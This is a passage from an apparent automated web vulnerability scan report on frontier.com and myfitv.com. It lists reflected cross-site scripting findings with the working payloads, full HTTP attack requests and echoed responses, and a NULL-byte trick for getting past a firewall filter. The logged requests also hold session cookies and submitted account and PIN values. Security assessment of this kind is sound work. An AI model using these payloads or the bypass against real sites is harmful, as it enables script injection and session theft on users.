yPiBjYW4gaGVscCB5b3Ugd2l0aCBhbnkgcXVlc3Rpb25zIHlvdSBtYXkgaGF2ZcKgd2l0aCByZWdhcmRzIHRvwqB0aGUgcHJvZHVjdHMgYW5kIHNlcnZpY2VzIG9uIHlvdXIgYWNjb3VudC5kAg0PDxYCHwJoZGQCEQ9kFgJmDxYCHwAF0Bk8ZGl2IGNsYXNzPSJmb290ZXIiPg0KICAgIDxkaXYgY2xhc3M9ImZvb3Rlci1zZWN0aW9ucyI%2BDQogICAgICAgIDxkaXYgaWQ9ImhlbHBTdXBwb3J0Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BSGVscCAmYW1wOyBTdXBwb3J0IDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2N1c3RvbWVyc2VydmljZS8iPkNvbnRhY3QgRnJvbnRpZXI8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2JpbGxpbmcvIj5CaWxsaW5nICZhbXA7IFBheW1lbnQgSW5mb3JtYXRpb248L2E%2BDQogICAgICAgICAgICAgICAgPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvY2FycmllcmZyZWV6ZS8iPlByb3RlY3QgWW91ciBBY2NvdW50PC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9yZXRhaWxzdG9yZXMvIj5Mb2NhdGUgUmV0YWlsIFN0b3JlczwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyaGVscC5jb20vdGVjaHN1cHBvcnQiPlRlY2huaWNhbA0KICAgICAgICAgICAgICAgICAgICBTdXBwb3J0PC9hPiA8L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgY2xhc3M9IkJvdHRvbV9zcGFjZXIiPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0icHJvZ3JhbXMiPg0KICAgICAgICAgICAgPHVsPg0KICAgICAgICAgICAgICAgIDxsaSBjbGFzcz0iZm9vdGVyX2hlYWRpbmdzIj5RdWljayBMaW5rczwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iaHR0cHM6Ly9mcm9udGllci5nbG9ieXNvbmxpbmUuY29tL2N2L3NjcmlwdHMvQUJFMC9lbmcvbG9nLmFzcD9ncnU9NDM3NjYyOTEwJmFtcDtzZWM9Ij4NCiAgICAgICAgICAgICAgICAgICAgQnVzaW5lc3MgT25saW5lIEJpbGwgUGF5PC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9mcmllbmRsaW5rLyI%2BQ3VzdG9tZXIgUmVmZXJyYWw8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2RvbmF0ZS8iPkdyZWF0IEZyb250aWVyIERvbmF0ZTwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvZGlzY291bnRwcm9ncmFtcy8iPkRpc2NvdW50IFByb2dyYW1zPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvYWR2ZXJ0aXNlLyI%2BQWR2ZXJ0aXNlIHdpdGggVXM8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICA8L3VsPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBjbGFzcz0iQm90dG9tX3NwYWNlciI%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGlkPSJhYm91dCI%2BDQogICAgICAgICAgICA8dWw%2BDQogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJmb290ZXJfaGVhZGluZ3MiPkFib3V0IFVzPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL2NvcnBvcmF0ZV9jb21tdW5pY2F0aW9ucy8iPkNvcnBvcmF0ZSBDb21tdW5pY2F0aW9uczwvYT48L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSJodHRwOi8vY29ycG9yYXRlLmZyb250aWVyLmNvbS9kZWZhdWx0LmFzcHg%2FbT01JmFtcDtwPTQzIj5DYXJlZXJzPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9waHguY29ycG9yYXRlLWlyLm5ldC9waG9lbml4LnpodG1sP2M9NjY1MDgmYW1wO3A9aXJvbC1pcmhvbWUiPkludmVzdG9yDQogICAgICAgICAgICAgICAgICAgIFJlbGF0aW9uczwvYT48L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSJodHRwOi8vcGh4LmNvcnBvcmF0ZS1pci5uZXQvcGhvZW5peC56aHRtbD9jPTY2NTA4JmFtcDtwPWlyb2wtbmV3cyZhbXA7bnlvPTAiPg0KICAgICAgICAgICAgICAgICAgICBQcmVzcyBSb29tPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9mYWNlc19vZl9mcm9udGllciI%2BRmFjZXMgb2YgRnJvbnRpZXI8L2E%2BPC9saT4NCiAgICAgICAgICAgIDwvdWw%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGNsYXNzPSJCb3R0b21fc3BhY2VyIj4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgaWQ9ImxlZ2FsUmVndWxhdG9yeSI%2BDQogICAgICAgICAgICA8dWw%2BDQogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJmb290ZXJfaGVhZGluZ3MiPkxlZ2FsICZhbXA7IFJlZ3VsYXRvcnk8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvcG9saWNpZXMvIj5Qb2xpY2llcyAmYW1wOyBOb3RpZmljYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL3Rlcm1zLyI%2BVGVybXMgYW5kIENvbmRpdGlvbnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL3dob2xlc2FsZS8iPldob2xlc2FsZSAmYW1wOyBDYXJyaWVyIFNlcnZpY2VzPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9jYXJyaWVyLmZyb250aWVyY29ycC5jb20vY3J0Zi90YXJpZmZzL2luZGV4LmNmbT9mdXNlYWN0aW9uPW1haW4mYW1wO3NjdG5JRD0xOSI%2BDQogICAgICAgICAgICAgICAgICAgIFRhcmlmZnM8L2E%2BPC9saT4NCiAgICAgICAgICAgIDwvdWw%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8cCBjbGFzcz0iY2xlYXIiPg0KICAgICAgICA8L3A%2BDQogICAgICAgIDxkaXYgaWQ9ImZvb3RlckNyZWRpdHMiPg0KICAgICAgICAgICAgPGRpdj4NCiAgICAgICAgICAgICAgICA8c3Ryb25nPiZjb3B5OzIwMTEgRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMgQ29ycG9yYXRpb24uIEFsbCByaWdodHMgcmVzZXJ2ZWQuPC9zdHJvbmc%2BDQogICAgICAgICAgICA8L2Rpdj4NCiAgICAgICAgICAgIDwhLS0JPGltZyBzdHlsZT0iZmxvYXQ6IHJpZ2h0OyIgd2lkdGg9IjMzOXB4IiBoZWlnaHQ9IjM3cHgiIGFsdD0iIiBzcmM9Ii9pbWFnZXMvRlRSTWFpbi9waG9uZV9jb3B5LnBuZyIgIC8%2BLS0%2BDQogICAgICAgIDwvZGl2Pg0KICAgIDwvZGl2Pg0KPC9kaXY%2BZAITDxYCHwAFiSE8YnI%2BCjwhLS1NYXJrdXAgZm9yIEluaXRpYWwgT3ZlcmxheSB0aGF0IGNhbm5vdCBiZSBjbG9zZWQgd2l0aG91dCBzdWJtaXR0aW5nIHBob25lL3ppcC0tPgo8ZGl2IGlkPSJvdmVyU2NyZWVuIj4mbmJzcDs8L2Rpdj4KPGRpdiBpZD0ib3ZlcmxheUluaXRpYWxGb3JtIiBjbGFzcz0ib3ZlcmxheSI%2BCiAgICA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvRlRSTWFpbi9ncmFkaWVudEJveC5wbmciIGhlaWdodD0iMjYzIiB3aWR0aD0iNjQwIj4KICAgIDxkaXYgY2xhc3M9Im92ZXJsYXlJbm5lciI%2BCiAgICAgICAgPGgxPkhlbGxvITwvaDE%2BCiAgICAgICAgPHA%2BVG8gcHJvdmlkZSB5b3Ugd2l0aCBwcm9kdWN0cyBhbmQgc2VydmljZXMgdGhhdCBiZXN0IG1lZXQgeW91ciBuZWVkcywgd2UgbmVlZCB0byBrbm93IHlvdXIgbG9jYXRpb24uIFRoaXMgaW5mb3JtYXRpb24gaXMga2VwdCBwcml2YXRlITwvcD4KICAgICAgICA8Zm9ybSBuYW1lPSJmRm9ybTEiIGFjdGlvbj0iIyIgbWV0aG9kPSJwb3N0Ij4KICAgICAgICAgICAgPGRpdiBpZD0iZXJyb3JGaWVsZDEiIGNsYXNzPSJvdmVybGF5RXJyb3IiPlBsZWFzZSBlbnRlciBhIHZhbGlkIHBob25lIG51bWJlciBvciB6aXAgY29kZS48L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icGhvbmVMaW5lIj4KICAgICAgICAgICAgICAgIDxsYWJlbCBmb3I9InBob25lIj5QaG9uZSBOdW1iZXI8L2xhYmVsPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icGhvbmVGaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icGhvbmVBZmllbGQiPgogICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgbWF4bGVuZ3RoPSIzIiBpZD0icGhvbmVOdW1BIiBuYW1lPSJwaG9uZU51bUEiIG9ua2V5dXA9InJldHVybiB0cmFwS2V5cyhldmVudCx0aGlzLCdwaG9uZU51bUInKTsiIHZhbHVlPSIiIGNsYXNzPSJkZXB0aElucHV0IHRocmVlLWRpZyBwMSIgdHlwZT0idGV4dCI%2BCiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icGhvbmVCZmllbGQiPgogICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgbWF4bGVuZ3RoPSIzIiBpZD0icGhvbmVOdW1CIiBuYW1lPSJwaG9uZU51bUIiIG9ua2V5dXA9InJldHVybiB0cmFwS2V5cyhldmVudCx0aGlzLCdwaG9uZU51bUMnKTsiIHZhbHVlPSIiIGNsYXNzPSJkZXB0aElucHV0IHRocmVlLWRpZyBwMiIgdHlwZT0idGV4dCI%2BCiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icGhvbmVDZmllbGQiPgogICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgbWF4bGVuZ3RoPSI0IiBpZD0icGhvbmVOdW1DIiBuYW1lPSJwaG9uZU51bUMiIHZhbHVlPSIiIGNsYXNzPSJkZXB0aElucHV0IGZvdXItZGlnIHAzIiB0eXBlPSJ0ZXh0Ij48L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iemlwTGluZSI%2BCiAgICAgICAgICAgICAgICAgICAgPGxhYmVsPm9yIFppcCBDb2RlPC9sYWJlbD4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBGaWVsZCI%2BPGlucHV0IG1heGxlbmd0aD0iNSIgbmFtZT0iemlwQ29kZSIgdmFsdWU9IiIgaWQ9InppcElucHV0MSIgY2xhc3M9ImRlcHRoSW5wdXQgemlwIiB0eXBlPSJ0ZXh0Ij48L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ic3VibWl0TGluZSI%2BPGlucHV0IGlkPSJvdmVybGF5U3VibWl0IiB2YWx1ZT0iIiB0eXBlPSJzdWJtaXQiPjwvZGl2PgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY2hlY2tMaW5lIj4KICAgICAgICAgICAgICAgICAgICA8aW5wdXQgbmFtZT0ibmV3YmllIiB0eXBlPSJjaGVja2JveCI%2BCiAgICAgICAgICAgICAgICAgICAgPGxhYmVsIGlkPSJuZXdiVGV4dCIgZm9yPSJuZXdiaWUiPkNoZWNrIGhlcmUgaWYgeW91IGFyZSBhIG5ldyBjdXN0b21lci48L2xhYmVsPgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZm9ybT4KICAgIDwvZGl2Pgo8L2Rpdj4KPCEtLU1hcmt1cCBmb3IgIE92ZXJsYXkgdGhhdCBjYW4gYmUgY2xvc2VkIHdpdGhvdXQgc3VibWl0dGluZyBwaG9uZS96aXAtLT4KPGRpdiBpZD0ib3ZlcmxheUZvcm0iIGNsYXNzPSJvdmVybGF5Ij4KICAgIDxpbWcgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL2dyYWRpZW50Qm94LnBuZyIgaGVpZ2h0PSIyNjMiIHdpZHRoPSI2NDAiPgogICAgPGRpdiBjbGFzcz0ib3ZlcmxheUlubmVyIj4KICAgICAgICA8YSBocmVmPSIjIiBjbGFzcz0iY2xvc2VPdmVybGF5Ij5DTE9TRTwvYT4KICAgICAgICA8aDE%2BSGVsbG8hPC9oMT4KICAgICAgICA8cD5UbyBwcm92aWRlIHlvdSB3aXRoIHByb2R1Y3RzIGFuZCBzZXJ2aWNlcyB0aGF0IGJlc3QgbWVldCB5b3VyIG5lZWRzLCB3ZSBuZWVkIHRvIGtub3cgeW91ciBsb2NhdGlvbi4gVGhpcyBpbmZvcm1hdGlvbiBpcyBrZXB0IHByaXZhdGUhPC9wPgogICAgICAgIDxmb3JtIG5hbWU9ImZGb3JtMiIgYWN0aW9uPSIjIiBtZXRob2Q9InBvc3QiPgogICAgICAgICAgICA8ZGl2IGlkPSJlcnJvckZpZWxkMiIgY2xhc3M9Im92ZXJsYXlFcnJvciI%2BUGxlYXNlIGVudGVyIGEgdmFsaWQgcGhvbmUgbnVtYmVyIG9yIHppcCBjb2RlLjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUxpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0icGhvbmUiPlBob25lIE51bWJlcjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUZpZWxkIj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUFmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUNoYW5nZUEiIG5hbWU9InBob25lTnVtQ2hhbmdlQSIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQ2hhbmdlQicpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAxIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUJmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUNoYW5nZUIiIG5hbWU9InBob25lTnVtQ2hhbmdlQiIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQ2hhbmdlQycpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAyIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUNmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjQiIGlkPSJwaG9uZU51bUNoYW5nZUMiIG5hbWU9InBob25lTnVtQ2hhbmdlQyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgZm91ci1kaWcgcDMiIHR5cGU9InRleHQiPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBMaW5lIj4KICAgICAgICAgICAgICAgIDxsYWJlbD5vciBaaXAgQ29kZTwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBGaWVsZCI%2BPGlucHV0IG1heGxlbmd0aD0iNSIgbmFtZT0iemlwQ29kZSIgdmFsdWU9IiIgaWQ9InppcElucHV0MiIgY2xhc3M9ImRlcHRoSW5wdXQgemlwIiB0eXBlPSJ0ZXh0Ij48L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InN1Ym1pdExpbmUiPjxpbnB1dCBpZD0ib3ZlcmxheVN1Ym1pdENoYW5nZSIgdmFsdWU9IiIgdHlwZT0ic3VibWl0Ij48L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iY2hlY2tMaW5lIj4KICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSJuZXdiaWUiIHR5cGU9ImNoZWNrYm94Ij4KICAgICAgICAgICAgICAgIDxsYWJlbCBpZD0ibmV3YlRleHQiIGZvcj0ibmV3YmllIj5DaGVjayBoZXJlIGlmIHlvdSBhcmUgYSBuZXcgY3VzdG9tZXIuPC9sYWJlbD4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgPC9mb3JtPgogICAgPC9kaXY%2BCjwvZGl2PgpkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShjdGwwMCRjdGwwMCRGT0Jhc2VQSCRDb250ZW50UEgkaW1iU3VibWl0kXWwz0NKLGky0ztisQuqKCTAsjc%3D&hfPageType=1&hfRecord_Type=Category&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtVaAcctNum=67654764575467&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtVaPin=6457&ctl00%24ctl00%24FOBasePH%24ContentPH%24imbSubmit.x=12&ctl00%24ctl00%24FOBasePH%24ContentPH%24imbSubmit.y=3&phoneNumA=&phoneNumB=&phoneNumC=&zipCode= HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/Shop/Login.aspx
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=ks40bd45i0qr22450as2ev2m; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%252520Login%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fwww.frontier.com%25252Fimages%25252Fbtn_submit_shop.gif%2526ot%253DIMAGE%26oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A%252F%252Fgames.frontier.com%252Fgame.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Shop293ac'-alert(1)-'b884da74b02dcdeaf/Login.aspx');//]]>
...[SNIP]...

2.100. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc7ba'-alert(1)-'0140388e784 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopcc7ba'-alert(1)-'0140388e784/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Shopcc7ba'-alert(1)-'0140388e784/Login.aspx');//]]>
...[SNIP]...

2.101. https://www.frontier.com/Shop/Login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66bbb'%3balert(1)//84be4a726c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66bbb';alert(1)//84be4a726c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shop/Login.aspx?66bbb'%3balert(1)//84be4a726c9=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/Shop/Login.aspx?66bbb';alert(1)//84be4a726c9=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...

2.102. http://www.myfitv.com/search [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The value of the query request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003d6ce'%3balert(1)//9336b0fa1c5 was submitted in the query parameter. This input was echoed as 3d6ce';alert(1)//9336b0fa1c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search?utf8=%E2%9C%93&query=xss%003d6ce'%3balert(1)//9336b0fa1c5 HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat; __qca=P0-216653065-1315331121961; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.4.9.1315331433305; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=158259878.visitor|1=Arrived=2011-09-06=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:53:02 GMT
ETag: "64e6744e7db5d324afec0f75d50866d0"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIkYvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyUwMDNkNmNlJyUzYmFsZXJ0KDEpLy85MzM2YjBmYTFjNSIPc2Vzc2lvbl9pZCIlOGU3YzU1NTZjOWE3MTdkM2QzZDIzMDI5ZmE1Y2MyODI%3D--bb6a866ba6baf3100ee2ded8fc9da2d273d6affa; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 1.381151
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 31113
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
